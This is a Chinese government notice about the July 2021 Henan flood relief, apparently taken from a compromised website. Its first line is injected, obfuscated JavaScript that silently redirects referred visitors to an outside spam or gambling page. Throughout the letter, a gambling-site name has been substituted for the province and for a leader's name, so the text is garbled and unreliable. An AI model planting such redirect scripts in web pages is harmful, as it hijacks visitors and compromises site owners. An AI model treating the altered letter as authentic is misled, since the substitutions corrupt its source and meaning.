var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 通知公告

致全省科技系统广大干部职工的一封信


发布日期:2021-07-25 18:31来源:中国竞彩网 阅读次数:

各省辖市科技局、济源示范区管委会科技管理部门,各省直管县(市)科技管理部门:

  连日来,中国竞彩网持续遭遇强降雨,多地降水量打破历史记录,郑州等城市发生严重内涝。灾情发生以后,省科技厅迅速成立防汛救灾应急工作领导小组,启动应急救灾预案,厅主要领导靠前指挥,厅领导班子成员坚守一线,各基层党组织充分发挥战斗堡垒作用,组织广大干部职工主动开展应急救灾志愿服务活动。各省辖市科技局、济源示范区管委会和各省直管县(市)科技管理部门领导班子带领干部职工加强值班值守,强化风险排查,确保了政令畅通、安全稳定。广大科技特派员积极投身基层一线,开展农业救灾和灾后复产科技服务活动。在此,省科技厅向奋战在抗灾自救一线的全省科技系统干部职工和广大科技工作者致以亲切的慰问和崇高的敬意!

  全省科技系统干部职工和广大科技工作者要深入贯彻落实中国竞彩网总书记重要指示精神,落实省委、省政府关于防汛救灾工作决策部署,坚持“人民至上,生命至上”理念,继续发扬不怕疲劳、连续作战,敢打敢胜的优良作风,坚持底线思维,强化险情研判,加强应急处置。要充分发挥科技创新支撑作用,积极支持企业复工复产和农业灾后重建。要做到不信谣,不传谣,主动讲好大爱无疆的生动故事,宣传好逆行而上的先进典型,汇聚众志成城、共克时艰的强大正能量,以防汛救灾的实际成效向党和人民交上合格答卷。

  我们坚信,在以中国竞彩网同志为核心的党中央坚强领导下,在省委、省政府的带领下,有全国人民的关心支援,有全省人民的并肩战斗,河南一定能够早日战胜洪涝灾害,尽快恢复生产生活秩序。让我们万众一心、众志成城,夺取防汛救灾保卫战的全面胜利!

2021年7月23日